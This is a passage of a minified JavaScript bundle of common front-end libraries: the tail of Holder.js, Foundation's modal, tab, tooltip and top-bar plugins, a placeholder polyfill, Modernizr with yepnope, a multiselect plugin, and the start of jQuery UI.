n=this.regex.exec(o);return{width:+n[1],height:+n[2]}}},colors:{regex:/#([0-9a-f]{3,})\:#([0-9a-f]{3,})/i,output:function(o){var n=this.regex.exec(o);return{size:l.themes.gray.size,foreground:"#"+n[2],background:"#"+n[1]}}},text:{regex:/text\:(.*)/,output:function(n){return this.regex.exec(n)[1]}}};for(var h in a.flags){a.flags[h].match=function(n){return n.match(this.regex)}}a.add_theme=function(n,o){n!=null&&o!=null&&(l.themes[n]=o);return a};a.add_image=function(s,n){var r=k(n);if(r.length){for(var o=0,q=r.length;o<q;o++){var p=document.createElement("img");p.setAttribute("data-src",s);r[o].appendChild(p)}}return a};a.run=function(u){var v=f(l,u),s=k(v.images),w=true;for(var t=s.length,r=0;r<t;r++){var A=l.themes.gray;var y=s[r].getAttribute("data-src")||s[r].getAttribute("src");if(y&&!!~y.indexOf(v.domain)){var x=false,n=null,z=null;var q=y.substr(y.indexOf(v.domain)+v.domain.length+1).split("/");for(sl=q.length,j=0;j<sl;j++){if(a.flags.dimensions.match(q[j])){x=true;n=a.flags.dimensions.output(q[j])}else{if(a.flags.colors.match(q[j])){A=a.flags.colors.output(q[j])}else{if(v.themes[q[j]]){A=v.themes[q[j]]}else{if(a.flags.text.match(q[j])){z=a.flags.text.output(q[j])}}}}}if(x){s[r].setAttribute("data-src",y);var p=n.width+"x"+n.height;s[r].setAttribute("alt",z?z:A.text?A.text+" ["+p+"]":p);s[r].style.backgroundColor=A.background;var A=(z?f(A,{text:z}):A);if(!g){s[r].setAttribute("src",e(d,n,A))}}}}return a};c(m,function(){i||a.run()})})(Holder,window); (function(a){var b=false;a(document).on("click","a[data-reveal-id]",function(c){c.preventDefault();var d=a(this).attr("data-reveal-id");a("#"+d).reveal(a(this).data())});a.fn.reveal=function(e){var c=a(document),d={animation:"fadeAndPop",animationSpeed:300,closeOnBackgroundClick:true,dismissModalClass:"close-reveal-modal",open:a.noop,opened:a.noop,close:a.noop,closed:a.noop};e=a.extend({},d,e);return this.not(".reveal-modal.open").each(function(){var n=a(this),r=parseInt(n.css("top"),10),s=n.height()+r,l=false,o=a(".reveal-modal-bg"),j={open:{top:0,opacity:0,visibility:"visible",display:"block"},close:{top:r,opacity:1,visibility:"hidden",display:"none"}},f;if(o.length===0){o=a("<div />",{"class":"reveal-modal-bg"}).insertAfter(n);o.fadeTo("fast",0.8)}function t(){l=false}function m(){l=true}function h(){var u=a(".reveal-modal.open");if(u.length===1){b=true;u.trigger("reveal:close")}}function p(){if(!l){m();h();n.addClass("open");if(e.animation==="fadeAndPop"){j.open.top=c.scrollTop()-s;j.open.opacity=0;n.css(j.open);o.fadeIn(e.animationSpeed/2);n.delay(e.animationSpeed/2).animate({top:c.scrollTop()+r+"px",opacity:1},e.animationSpeed,function(){n.trigger("reveal:opened")})}if(e.animation==="fade"){j.open.top=c.scrollTop()+r;j.open.opacity=0;n.css(j.open);o.fadeIn(e.animationSpeed/2);n.delay(e.animationSpeed/2).animate({opacity:1},e.animationSpeed,function(){n.trigger("reveal:opened")})}if(e.animation==="none"){j.open.top=c.scrollTop()+r;j.open.opacity=1;n.css(j.open);o.css({display:"block"});n.trigger("reveal:opened")}}}function q(){var v=n.find(".flex-video"),u=v.find("iframe");if(u.length>0){u.attr("src",u.data("src"));v.fadeIn(100)}}n.bind("reveal:open.reveal",p);n.bind("reveal:open.reveal",q);function g(){if(!l){m();n.removeClass("open");if(e.animation==="fadeAndPop"){n.animate({top:c.scrollTop()-s+"px",opacity:0},e.animationSpeed/2,function(){n.css(j.close)});if(!b){o.delay(e.animationSpeed).fadeOut(e.animationSpeed,function(){n.trigger("reveal:closed")})}else{n.trigger("reveal:closed")}}if(e.animation==="fade"){n.animate({opacity:0},e.animationSpeed,function(){n.css(j.close)});if(!b){o.delay(e.animationSpeed).fadeOut(e.animationSpeed,function(){n.trigger("reveal:closed")})}else{n.trigger("reveal:closed")}}if(e.animation==="none"){n.css(j.close);if(!b){o.css({display:"none"})}n.trigger("reveal:closed")}b=false}}function k(){n.unbind(".reveal");o.unbind(".reveal");f.unbind(".reveal");a("body").unbind(".reveal")}function i(){var v=n.find(".flex-video"),u=v.find("iframe");if(u.length>0){u.data("src",u.attr("src"));u.attr("src","");v.fadeOut(100)}}n.bind("reveal:close.reveal",g);n.bind("reveal:closed.reveal",i);n.bind("reveal:opened.reveal reveal:closed.reveal",t);n.bind("reveal:closed.reveal",k);n.bind("reveal:open.reveal",e.open);n.bind("reveal:opened.reveal",e.opened);n.bind("reveal:close.reveal",e.close);n.bind("reveal:closed.reveal",e.closed);n.trigger("reveal:open");f=a("."+e.dismissModalClass).bind("click.reveal",function(){n.trigger("reveal:close")});if(e.closeOnBackgroundClick){o.css({cursor:"pointer"});o.bind("click.reveal",function(){n.trigger("reveal:close")})}a("body").bind("keyup.reveal",function(u){if(u.which===27){n.trigger("reveal:close")}})})}}(jQuery)); (function(a,f,b,e){var d={callback:a.noop,deep_linking:true,init:false},c={init:function(g){d=a.extend({},d,g);return this.each(function(){if(!d.init){c.events()}if(d.deep_linking){c.from_hash()}})},events:function(){a(b).on("click.fndtn",".tabs a",function(g){c.set_tab(a(this).parent("dd, li"),g)});d.init=true},set_tab:function(i,j){var g=i.closest("dl, ul").find(".active"),l=i.children("a").attr("href"),k=/^#/.test(l),h=a(l+"Tab");if(k&&h.length>0){if(j&&!d.deep_linking){j.preventDefault()}h.closest(".tabs-content").children("li").removeClass("active").hide();h.css("display","block").addClass("active")}g.removeClass("active");i.addClass("active");d.callback()},from_hash:function(){var h=f.location.hash,g=a('a[href="'+h+'"]');g.trigger("click.fndtn")}};a.fn.foundationTabs=function(g){if(c[g]){return c[g].apply(this,Array.prototype.slice.call(arguments,1))}else{if(typeof g==="object"||!g){return c.init.apply(this,arguments)}else{a.error("Method "+g+" does not exist on jQuery.foundationTabs")}}}}(jQuery,this,this.document)); (function(a,e,d){var c={bodyHeight:0,selector:".has-tip",additionalInheritableClasses:[],tooltipClass:".tooltip",tipTemplate:function(g,f){return'<span data-selector="'+g+'" class="'+c.tooltipClass.substring(1)+'">'+f+'<span class="nub"></span></span>'}},b={init:function(f){c=a.extend(c,f);c.selector=c.targetClass?c.targetClass:c.selector;return this.each(function(){var g=a("body");if(Modernizr.touch){g.on("click.tooltip touchstart.tooltip touchend.tooltip",c.selector,function(h){h.preventDefault();a(c.tooltipClass).hide();b.showOrCreateTip(a(this))});g.on("click.tooltip touchstart.tooltip touchend.tooltip",c.tooltipClass,function(h){h.preventDefault();a(this).fadeOut(150)})}else{g.on("mouseenter.tooltip mouseleave.tooltip",c.selector,function(i){var h=a(this);if(i.type==="mouseenter"){b.showOrCreateTip(h)}else{if(i.type==="mouseleave"){b.hide(h)}}})}a(this).data("tooltips",true)})},showOrCreateTip:function(f,h){var g=b.getTip(f);if(g&&g.length>0){b.show(f)}else{b.create(f,h)}},getTip:function(f){var g=b.selector(f),h=null;if(g){h=a("span[data-selector="+g+"]"+c.tooltipClass)}return(h.length>0)?h:false},selector:function(f){var h=f.attr("id"),g=f.data("selector");if(h===d&&g===d){g="tooltip"+Math.random().toString(36).substring(7);f.attr("data-selector",g)}return(h)?h:g},create:function(f,i){var g=a(c.tipTemplate(b.selector(f),a("<div>").html(i?i:f.attr("title")).html())),h=b.inheritable_classes(f);g.addClass(h).appendTo("body");if(Modernizr.touch){g.append('<span class="tap-to-close">tap to close </span>')}f.removeAttr("title");b.show(f)},reposition:function(l,m,f){var o,h,i,j,g,k;m.css("visibility","hidden").show();o=l.data("width");h=m.children(".nub");i=h.outerHeight();j=h.outerWidth();k=function(r,t,s,p,q,u){return r.css({top:t,bottom:p,left:q,right:s,"max-width":(u)?u:"auto"}).end()};k(m,(l.offset().top+l.outerHeight()+10),"auto","auto",l.offset().left,o);k(h,-i,"auto","auto",10);if(a(e).width()<767){if(l.data("mobile-width")){m.width(l.data("mobile-width")).css("left",15).addClass("tip-override")}else{g=l.closest(".columns");if(g.length<0){g=a("body")}if(g.outerWidth()){m.width(g.outerWidth()-25).css("left",15).addClass("tip-override")}else{var n=Math.ceil(a(e).width()*0.9);m.width(n).css("left",15).addClass("tip-override")}}k(h,-i,"auto","auto",l.offset().left)}else{if(f&&f.indexOf("tip-top")>-1){k(m,(l.offset().top-m.outerHeight()-i),"auto","auto",l.offset().left,o).removeClass("tip-override");k(h,"auto","auto",-i,"auto")}else{if(f&&f.indexOf("tip-left")>-1){k(m,(l.offset().top+(l.outerHeight()/2)-i),"auto","auto",(l.offset().left-m.outerWidth()-10),o).removeClass("tip-override");k(h,(m.outerHeight()/2)-(i/2),-i,"auto","auto")}else{if(f&&f.indexOf("tip-right")>-1){k(m,(l.offset().top+(l.outerHeight()/2)-i),"auto","auto",(l.offset().left+l.outerWidth()+10),o).removeClass("tip-override");k(h,(m.outerHeight()/2)-(i/2),"auto","auto",-i)}else{if(f&&f.indexOf("tip-centered-top")>-1){k(m,(l.offset().top-m.outerHeight()-i),"auto","auto",(l.offset().left+((l.outerWidth()-m.outerWidth())/2)),o).removeClass("tip-override");k(h,"auto",((m.outerWidth()/2)-(i/2)),-i,"auto")}else{if(f&&f.indexOf("tip-centered-bottom")>-1){k(m,(l.offset().top+l.outerHeight()+10),"auto","auto",(l.offset().left+((l.outerWidth()-m.outerWidth())/2)),o).removeClass("tip-override");k(h,-i,((m.outerWidth()/2)-(i/2)),"auto","auto")}}}}}}m.css("visibility","visible").hide()},inheritable_classes:function(i){var h=["tip-top","tip-left","tip-bottom","tip-right","tip-centered-top","tip-centered-bottom","noradius"].concat(c.additionalInheritableClasses),f=i.attr("class"),g=f?a.map(f.split(" "),function(j,k){if(a.inArray(j,h)!==-1){return j}}).join(" "):"";return a.trim(g)},show:function(f){var g=b.getTip(f);b.reposition(f,g,f.attr("class"));g.fadeIn(150)},hide:function(f){var g=b.getTip(f);g.fadeOut(150)},reload:function(){var f=a(this);return(f.data("tooltips"))?f.foundationTooltips("destroy").foundationTooltips("init"):f.foundationTooltips("init")},destroy:function(){return this.each(function(){a(e).off(".tooltip");a(c.selector).off(".tooltip");a(c.tooltipClass).each(function(f){a(a(c.selector).get(f)).attr("title",a(this).text())}).remove()})}};a.fn.foundationTooltips=function(f){if(b[f]){return b[f].apply(this,Array.prototype.slice.call(arguments,1))}else{if(typeof f==="object"||!f){return b.init.apply(this,arguments)}else{a.error("Method "+f+" does not exist on jQuery.foundationTooltips")}}}}(jQuery,this)); (function(a,g,f){var e={index:0,initialized:false},d={init:function(h){return this.each(function(){e=a.extend(e,h);e.$w=a(g),e.$topbar=a("nav.top-bar"),e.$section=e.$topbar.find("section"),e.$titlebar=e.$topbar.children("ul:first");var i=a("<div class='top-bar-js-breakpoint'/>").appendTo("body");e.breakPoint=i.width();i.remove();if(!e.initialized){d.assemble();e.initialized=true}if(!e.height){d.largestUL()}if(e.$topbar.parent().hasClass("fixed")){a("body").css("padding-top",e.$topbar.outerHeight())}a(".top-bar .toggle-topbar").off("click.fndtn").on("click.fndtn",function(j){j.preventDefault();if(d.breakpoint()){e.$topbar.toggleClass("expanded");e.$topbar.css("min-height","")}if(!e.$topbar.hasClass("expanded")){e.$section.css({left:"0%"});e.$section.find(">.name").css({left:"100%"});e.$section.find("li.moved").removeClass("moved");e.index=0}});a(".top-bar .has-dropdown>a").off("click.fndtn").on("click.fndtn",function(l){if(Modernizr.touch||d.breakpoint()){l.preventDefault()}if(d.breakpoint()){var k=a(this),j=k.closest("li");e.index+=1;j.addClass("moved");e.$section.css({left:-(100*e.index)+"%"});e.$section.find(">.name").css({left:100*e.index+"%"});k.siblings("ul").height(e.height+e.$titlebar.outerHeight(true));e.$topbar.css("min-height",e.height+e.$titlebar.outerHeight(true)*2)}});a(g).on("resize.fndtn.topbar",function(){if(!d.breakpoint()){e.$topbar.css("min-height","")}});a(".top-bar .has-dropdown .back").off("click.fndtn").on("click.fndtn",function(m){m.preventDefault();var l=a(this),j=l.closest("li.moved"),k=j.parent();e.index-=1;e.$section.css({left:-(100*e.index)+"%"});e.$section.find(">.name").css({left:100*e.index+"%"});if(e.index===0){e.$topbar.css("min-height",0)}setTimeout(function(){j.removeClass("moved")},300)})})},breakpoint:function(){return e.$w.width()<e.breakPoint},assemble:function(){e.$section.detach();e.$section.find(".has-dropdown>a").each(function(){var i=a(this),h=i.siblings(".dropdown"),j=a('<li class="title back js-generated"><h5><a href="#"></a></h5></li>');j.find("h5>a").html(i.html());h.prepend(j)});e.$section.appendTo(e.$topbar)},largestUL:function(){var j=e.$topbar.find("section ul ul"),h=j.first(),i=0;j.each(function(){if(a(this).children("li").length>h.children("li").length){h=a(this)}});h.children("li").each(function(){i+=a(this).outerHeight(true)});e.height=i}};a.fn.foundationTopBar=function(h){if(d[h]){return d[h].apply(this,Array.prototype.slice.call(arguments,1))}else{if(typeof h==="object"||!h){return d.init.apply(this,arguments)}else{a.error("Method "+h+" does not exist on jQuery.foundationTopBar")}}};if(a(".sticky").length>0){var c=a(".sticky").length?a(".sticky").offset().top:0,b=a(g);b.scroll(function(){if(b.scrollTop()>=c){a(".sticky").addClass("fixed")}else{if(b.scrollTop()<c){a(".sticky").removeClass("fixed")}}})}}(jQuery,this)); (function(h,f,a){var b=a("#topMenu"),g="click.fndtn";if(b.length>0){b.css("margin-top",b.height()*-1)}var c=a("#sidebarButton");if(c.length>0){a("#sidebarButton").on(g,function(i){i.preventDefault();a("body").toggleClass("active")})}var d=a("#menuButton");if(d.length>0){a("#menuButton").on(g,function(i){i.preventDefault();a("body").toggleClass("active-menu")})}var e=a("#switchPanels");if(e.length>0){a("#switchPanels dd").on(g,function(i){i.preventDefault();var k=a(this).children("a").attr("href"),j=a(k).index();a(this).toggleClass("active").siblings().removeClass("active");a(k).parent().css("left",(j*(-100)+"%"))})}a("#nav li a").on(g,function(j){j.preventDefault();var k=a(this).attr("href"),i=a(k);a("html, body").animate({scrollTop:i.offset().top},300)})}(this,document,jQuery)); /* http://mths.be/placeholder v2.0.7 by @mathias */ (function(l,d,a){var f="placeholder" in d.createElement("input"),g="placeholder" in d.createElement("textarea"),i=a.fn,k=a.valHooks,e,h;if(f&&g){h=i.placeholder=function(){return this};h.input=h.textarea=true}else{h=i.placeholder=function(){var m=this;m.filter((f?"textarea":":input")+"[placeholder]").not(".placeholder").bind({"focus.placeholder":c,"blur.placeholder":j}).data("placeholder-enabled",true).trigger("blur.placeholder");return m};h.input=f;h.textarea=g;e={get:function(n){var m=a(n);return m.data("placeholder-enabled")&&m.hasClass("placeholder")?"":n.value},set:function(n,o){var m=a(n);if(!m.data("placeholder-enabled")){return n.value=o}if(o==""){n.value=o;if(n!=d.activeElement){j.call(n)}}else{if(m.hasClass("placeholder")){c.call(n,true,o)||(n.value=o)}else{n.value=o}}return m}};f||(k.input=e);g||(k.textarea=e);a(function(){a(d).delegate("form","submit.placeholder",function(){var m=a(".placeholder",this).each(c);setTimeout(function(){m.each(j)},10)})});a(l).bind("beforeunload.placeholder",function(){a(".placeholder").each(function(){this.value=""})})}function b(m){var n={},o=/^jQuery\d+$/;a.each(m.attributes,function(q,p){if(p.specified&&!o.test(p.name)){n[p.name]=p.value}});return n}function c(n,p){var o=this,m=a(o);if(o.value==m.attr("placeholder")&&m.hasClass("placeholder")){if(m.data("placeholder-password")){m=m.hide().next().show().attr("id",m.removeAttr("id").data("placeholder-id"));if(n===true){return m[0].value=p}m.focus()}else{o.value="";m.removeClass("placeholder");o==d.activeElement&&o.select()}}}function j(){var o,r=this,m=a(r),n=m,q=this.id;if(r.value==""){if(r.type=="password"){if(!m.data("placeholder-textinput")){try{o=m.clone().attr({type:"text"})}catch(p){o=a("<input>").attr(a.extend(b(this),{type:"text"}))}o.removeAttr("name").data({"placeholder-password":true,"placeholder-id":q}).bind("focus.placeholder",c);m.data({"placeholder-textinput":o,"placeholder-id":q}).before(o)}m=m.removeAttr("id").hide().prev().attr("id",q).show()}m.addClass("placeholder");m[0].value=m.attr("placeholder")}else{m.removeClass("placeholder")}}}(this,document,jQuery)); window.Modernizr=function(E,G,I){function ag(b){R.cssText=b}function ah(c,d){return ag(U.join(c+";")+(d||""))}function F(c,d){return typeof c===d}function H(c,d){return !!~(""+c).indexOf(d)}function J(c,g,h){for(var i in c){var j=g[c[i]];if(j!==I){return h===!1?c[i]:F(j,"function")?j.bind(h||g):j}}return !1}var K="2.6.2",M={},N=!0,O=G.documentElement,P="modernizr",Q=G.createElement(P),R=Q.style,S,T={}.toString,U=" -webkit- -moz- -o- -ms- ".split(" "),V={svg:"http://www.w3.org/2000/svg"},W={},X={},Y={},Z=[],aa=Z.slice,ab,ac=function(b,g,h,o){var p,q,r,s,t=G.createElement("div"),u=G.body,v=u||G.createElement("body");if(parseInt(h,10)){while(h--){r=G.createElement("div"),r.id=o?o[h]:P+(h+1),t.appendChild(r)}}return p=["&#173;",'<style id="s',P,'">',b,"</style>"].join(""),t.id=P,(u?t:v).innerHTML+=p,v.appendChild(t),u||(v.style.background="",v.style.overflow="hidden",s=O.style.overflow,O.style.overflow="hidden",O.appendChild(v)),q=g(t,b),u?t.parentNode.removeChild(t):(v.parentNode.removeChild(v),O.style.overflow=s),!!q},ad=function(a){var e=E.matchMedia||E.msMatchMedia;if(e){return e(a).matches}var f;return ac("@media "+a+" { #"+P+" { position: absolute; } }",function(c){f=(E.getComputedStyle?getComputedStyle(c,null):c.currentStyle)["position"]=="absolute"}),f},ae={}.hasOwnProperty,af;!F(ae,"undefined")&&!F(ae.call,"undefined")?af=function(c,d){return ae.call(c,d)}:af=function(c,d){return d in c&&F(c.constructor.prototype[d],"undefined")},Function.prototype.bind||(Function.prototype.bind=function(a){var f=this;if(typeof f!="function"){throw new TypeError}var g=aa.call(arguments,1),h=function(){if(this instanceof h){var b=function(){};b.prototype=f.prototype;var c=new b,d=f.apply(c,g.concat(aa.call(arguments)));return Object(d)===d?d:c}return f.apply(a,g.concat(aa.call(arguments)))};return h}),W.touch=function(){var a;return"ontouchstart" in E||E.DocumentTouch&&G instanceof DocumentTouch?a=!0:ac(["@media (",U.join("touch-enabled),("),P,")","{#modernizr{top:9px;position:absolute}}"].join(""),function(b){a=b.offsetTop===9}),a},W.svg=function(){return !!G.createElementNS&&!!G.createElementNS(V.svg,"svg").createSVGRect},W.inlinesvg=function(){var b=G.createElement("div");return b.innerHTML="<svg/>",(b.firstChild&&b.firstChild.namespaceURI)==V.svg},W.svgclippaths=function(){return !!G.createElementNS&&/SVGClipPath/.test(T.call(G.createElementNS(V.svg,"clipPath")))};for(var L in W){af(W,L)&&(ab=L.toLowerCase(),M[ab]=W[L](),Z.push((M[ab]?"":"no-")+ab))}return M.addTest=function(c,e){if(typeof c=="object"){for(var f in c){af(c,f)&&M.addTest(f,c[f])}}else{c=c.toLowerCase();if(M[c]!==I){return M}e=typeof e=="function"?e():e,typeof N!="undefined"&&N&&(O.className+=" "+(e?"":"no-")+c),M[c]=e}return M},ag(""),Q=S=null,function(s,t){function C(e,f){var g=e.createElement("p"),h=e.getElementsByTagName("head")[0]||e.documentElement;return g.innerHTML="x<style>"+f+"</style>",h.insertBefore(g.lastChild,h.firstChild)}function D(){var b=an.elements;return typeof b=="string"?b.split(" "):b}function ai(c){var d=A[c[y]];return d||(d={},z++,c[y]=z,A[z]=d),d}function aj(b,d,e){d||(d=t);if(B){return d.createElement(b)}e||(e=ai(d));var h;return e.cache[b]?h=e.cache[b].cloneNode():w.test(b)?h=(e.cache[b]=e.createElem(b)).cloneNode():h=e.createElem(b),h.canHaveChildren&&!v.test(b)?e.frag.appendChild(h):h}function ak(b,h){b||(b=t);if(B){return b.createDocumentFragment()}h=h||ai(b);var i=h.frag.cloneNode(),j=0,k=D(),l=k.length;for(;j<l;j++){i.createElement(k[j])}return i}function al(c,d){d.cache||(d.cache={},d.createElem=c.createElement,d.createFrag=c.createDocumentFragment,d.frag=d.createFrag()),c.createElement=function(a){return an.shivMethods?aj(a,c,d):d.createElem(a)},c.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+D().join().replace(/\w+/g,function(b){return d.createElem(b),d.frag.createElement(b),'c("'+b+'")'})+");return n}")(an,d.frag)}function am(b){b||(b=t);var d=ai(b);return an.shivCSS&&!x&&!d.hasCSS&&(d.hasCSS=!!C(b,"article,aside,figcaption,figure,footer,header,hgroup,nav,section{display:block}mark{background:#FF0;color:#000}")),B||al(b,d),b}var u=s.html5||{},v=/^<|^(?:button|map|select|textarea|object|iframe|option|optgroup)$/i,w=/^(?:a|b|code|div|fieldset|h1|h2|h3|h4|h5|h6|i|label|li|ol|p|q|span|strong|style|table|tbody|td|th|tr|ul)$/i,x,y="_html5shiv",z=0,A={},B;(function(){try{var b=t.createElement("a");b.innerHTML="<xyz></xyz>",x="hidden" in b,B=b.childNodes.length==1||function(){t.createElement("a");var c=t.createDocumentFragment();return typeof c.cloneNode=="undefined"||typeof c.createDocumentFragment=="undefined"||typeof c.createElement=="undefined"}()}catch(d){x=!0,B=!0}})();var an={elements:u.elements||"abbr article aside audio bdi canvas data datalist details figcaption figure footer header hgroup mark meter nav output progress section summary time video",shivCSS:u.shivCSS!==!1,supportsUnknownElements:B,shivMethods:u.shivMethods!==!1,type:"default",shivDocument:am,createElement:aj,createDocumentFragment:ak};s.html5=an,am(t)}(this,G),M._version=K,M._prefixes=U,M.mq=ad,M.testStyles=ac,O.className=O.className.replace(/(^|\s)no-js(\s|$)/,"$1$2")+(N?" js "+Z.join(" "):""),M}(this,this.document),function(C,E,G){function H(b){return"[object Function]"==S.call(b)}function I(b){return"string"==typeof b}function J(){}function K(b){return !b||"loaded"==b||"complete"==b||"uninitialized"==b}function L(){var b=T.shift();U=1,b?b.t?Q(function(){("c"==b.t?F.injectCss:F.injectJs)(b.s,0,b.a,b.x,b.e,1)},0):(b(),L()):U=0}function M(b,g,h,m,n,p,q){function s(a){if(!v&&K(t.readyState)&&(x.r=v=1,!U&&L(),t.onload=t.onreadystatechange=null,a)){"img"!=b&&Q(function(){X.removeChild(t)},50);for(var c in ac[g]){ac[g].hasOwnProperty(c)&&ac[g][c].onload()}}}var q=q||F.errorTimeout,t=E.createElement(b),v=0,w=0,x={t:h,s:g,e:n,a:p,x:q};1===ac[g]&&(w=1,ac[g]=[]),"object"==b?t.data=g:(t.src=g,t.type=b),t.width=t.height="0",t.onerror=t.onload=t.onreadystatechange=function(){s.call(this,w)},T.splice(m,0,x),"img"!=b&&(w||2===ac[g]?(X.insertBefore(t,W?null:R),Q(s,q)):ac[g].push(t))}function N(e,g,h,i,j){return U=0,g=g||"j",I(e)?M("c"==g?Z:Y,e,g,this.i++,h,i,j):(T.splice(this.i++,0,e),1==T.length&&L()),this}function O(){var b=F;return b.loader={load:N,i:0},b}var P=E.documentElement,Q=C.setTimeout,R=E.getElementsByTagName("script")[0],S={}.toString,T=[],U=0,V="MozAppearance" in P.style,W=V&&!!E.createRange().compareNode,X=W?P:R.parentNode,P=C.opera&&"[object Opera]"==S.call(C.opera),P=!!E.attachEvent&&!P,Y=V?"object":P?"script":"img",Z=P?"script":Y,aa=Array.isArray||function(b){return"[object Array]"==S.call(b)},ab=[],ac={},ad={timeout:function(c,d){return d.length&&(c.timeout=d[0]),c}},D,F;F=function(c){function d(h){var h=h.split("!"),i=ab.length,j=h.pop(),l=h.length,j={url:j,origUrl:j,prefixes:h},o,p,q;for(p=0;p<l;p++){q=h[p].split("="),(o=ad[q.shift()])&&(j=o(j,q))}for(p=0;p<i;p++){j=ab[p](j)}return j}function e(b,l,o,p,q){var r=d(b),s=r.autoCallback;r.url.split(".").pop().split("?").shift(),r.bypass||(l&&(l=H(l)?l:l[b]||l[p]||l[b.split("/").pop().split("?")[0]]),r.instead?r.instead(b,l,o,p,q):(ac[r.url]?r.noexec=!0:ac[r.url]=1,o.load(r.url,r.forceCSS||!r.forceJS&&"css"==r.url.split(".").pop().split("?").shift()?"c":G,r.noexec,r.attrs,r.timeout),(H(l)||H(s))&&o.load(function(){O(),l&&l(r.origUrl,q,p),s&&s(r.origUrl,q,p),ac[r.url]=2})))}function f(g,o){function p(b,h){if(b){if(I(b)){h||(s=function(){var i=[].slice.call(arguments);t.apply(this,i),u()}),e(b,s,o,0,q)}else{if(Object(b)===b){for(w in v=function(){var a=0,i;for(i in b){b.hasOwnProperty(i)&&a++}return a}(),b){b.hasOwnProperty(w)&&(!h&&!--v&&(H(s)?s=function(){var i=[].slice.call(arguments);t.apply(this,i),u()}:s[w]=function(i){return function(){var a=[].slice.call(arguments);i&&i.apply(this,a),u()}}(t[w])),e(b[w],s,o,w,q))}}}}else{!h&&u()}}var q=!!g.test,r=g.load||g.both,s=g.callback||J,t=s,u=g.complete||J,v,w;p(q?g.yep:g.nope,!!r),r&&p(r)}var k,m,n=this.yepnope.loader;if(I(c)){e(c,0,n,0)}else{if(aa(c)){for(k=0;k<c.length;k++){m=c[k],I(m)?e(m,0,n,0):aa(m)?F(m):Object(m)===m&&f(m,n)}}else{Object(c)===c&&f(c,n)}}},F.addPrefix=function(c,d){ad[c]=d},F.addFilter=function(b){ab.push(b)},F.errorTimeout=10000,null==E.readyState&&E.addEventListener&&(E.readyState="loading",E.addEventListener("DOMContentLoaded",D=function(){E.removeEventListener("DOMContentLoaded",D,0),E.readyState="complete"},0)),C.yepnope=O(),C.yepnope.executeStack=L,C.yepnope.injectJs=function(b,f,g,h,m,n){var p=E.createElement("script"),q,r,h=h||F.errorTimeout;p.src=b;for(r in g){p.setAttribute(r,g[r])}f=n?L:f||J,p.onreadystatechange=p.onload=function(){!q&&K(p.readyState)&&(q=1,f(),p.onload=p.onreadystatechange=null)},Q(function(){q||(q=1,f(1))},h),m?p.onload():R.parentNode.insertBefore(p,R)},C.yepnope.injectCss=function(b,f,h,k,l,m){var k=E.createElement("link"),n,f=m?L:f||J;k.href=b,k.rel="stylesheet",k.type="text/css";for(n in h){k.setAttribute(n,h[n])}l||(R.parentNode.insertBefore(k,R),Q(f,0))}}(this,document),Modernizr.load=function(){yepnope.apply(window,[].slice.call(arguments,0))},Modernizr.addTest("ie8compat",function(){return !window.addEventListener&&document.documentMode&&document.documentMode===7}); (function(a){var b={init:function(k){var h,c,d="",e="";a.each(a(this),function(i,p){h=Math.random().toString(36).substr(2,9);a(p).hide().attr("rel",h);a(p).parent().append("<div id='"+h+"' class='zselect'><ul></ul></div>");a("#"+h+" ul").append("<li class='selected selectall'><strong>"+k.selectAllText[0]+"</strong></li>");a.each(p,function(q,r){c=(a(r).is("[data-selected]"))?"checked='checked'":"";if(a(r).is("[data-disabled]")){d="disabled='disabled'";e="class='disabled'"}a("#"+h+" ul").append("<li "+e+"><input value='"+a(r).val()+"' type='checkbox' "+c+" "+d+" />"+a(r).text()+"</li>")})});if(k.filter===true){if(k.filterResult===undefined){k.filterResult=true}if(k.filterResultText===undefined){k.filterResultText="showed"}var f=(k.filterPlaceholder!==undefined)?k.filterPlaceholder:"Filter...";var n=this.attr("rel");a("div#"+n+" ul").prepend('<li class="zmsfilter"><input type="text" placeholder="'+f+'" /></li>');if(k.filterResult===true){a("div#"+n+" ul").append('<li class="filterResult"></li>')}a("div#"+n+" ul li.zmsfilter input").keyup(function(){var q=a(this).val().toLowerCase();var i=0,p=a("div#"+n+" ul li input:checkbox").length;a("div#"+n+" ul li input:checkbox").filter(function(r,s){if(a(s).val().toLowerCase().indexOf(q)===-1&&a(s).parent().text().toLowerCase().indexOf(q)===-1){a(s).parent().hide()}else{a(s).parent().show();i++}});if(k.filterResult===true){a("div#"+n+" ul li.filterResult").text(k.filterResultText+" "+i+"/"+p)}})}if(k.live!==undefined){var n=this.attr("rel");a(".zselect#"+n).on("change","input:checkbox",function(i){a(k.live).val(b.getValue(a("select[rel='"+n+"']")))})}if(k.get!==undefined){var m=window.location.search.substring(1);var o=m.split("&");var j=false;for(var g=0;g<o.length;g++){var l=o[g].split("=");if(l[0]==k.get){j=l[1].split("%2C")}}if(j){var n=this.attr("rel");for(var g=0;g<j.length;g++){a(".zselect#"+n+" ul li input:checkbox[value='"+j[g]+"']").trigger("click")}}}a(".zselect#"+n).on("click","li",function(i){var s=a(this);var q=a('select[rel="'+h+'"]');s.toggleClass("selected");var p=s.parent();var r=p.find("li.selected").not("li.selectall");if(s.hasClass("selectall")){if(s.hasClass("selected")){r.removeClass("selected");q.find("option").prop("selected",false)}}else{if(r.length>0){p.find("li.selectall").removeClass("selected")}q.find('option[value="'+a(this).find('input[type="checkbox"]').val()+'"]').prop("selected",s.hasClass("selected"))}})},getValue:function(d){if(d===undefined){d=this}var e=new Array();var c=a(d).attr("rel");a.each(a("div#"+c+" ul li input"),function(f,g){if(a(g).val()!==undefined){if(a(g).prop("checked")){e.push(a(g).val())}}});return e},set:function(d,c){a("div#"+a(this).attr("rel")+" ul li input:checkbox[value='"+d+"']").prop("checked",c).change()},uncheckall_inpage:function(){a(".zselect ul li input:checkbox").prop("checked",false).change()},checkall_inpage:function(){a(".zselect ul li input:checkbox").prop("checked",true).change()},checkall:function(){a("div#"+a(this).attr("rel")+" ul li input:checkbox").prop("checked",true).change()},uncheckall:function(){a("div#"+a(this).attr("rel")+" ul li input:checkbox").prop("checked",false).change()},destroy:function(c){a("div#"+a(this).attr("rel")+" ul li input:checkbox[value='"+c+"']").parent().remove()},reflow:function(){onResize(true)}};a.fn.zmultiselect=function(c){if(b[c]){return b[c].apply(this,Array.prototype.slice.call(arguments,1))}else{if(typeof c==="object"||!c){return b.init.apply(this,arguments)}else{a.error("Method "+c+" does not exist on zmultiselect")}}}})(jQuery); /* jQuery UI - v1.10.4 - 2014-03-23 * http://jqueryui.com * Includes: jquery.ui.core.js, jquery.ui.datepicker.js * Copyright 2014 jQuery Foundation and other contributors; Licensed MIT */ (function(a,d){var 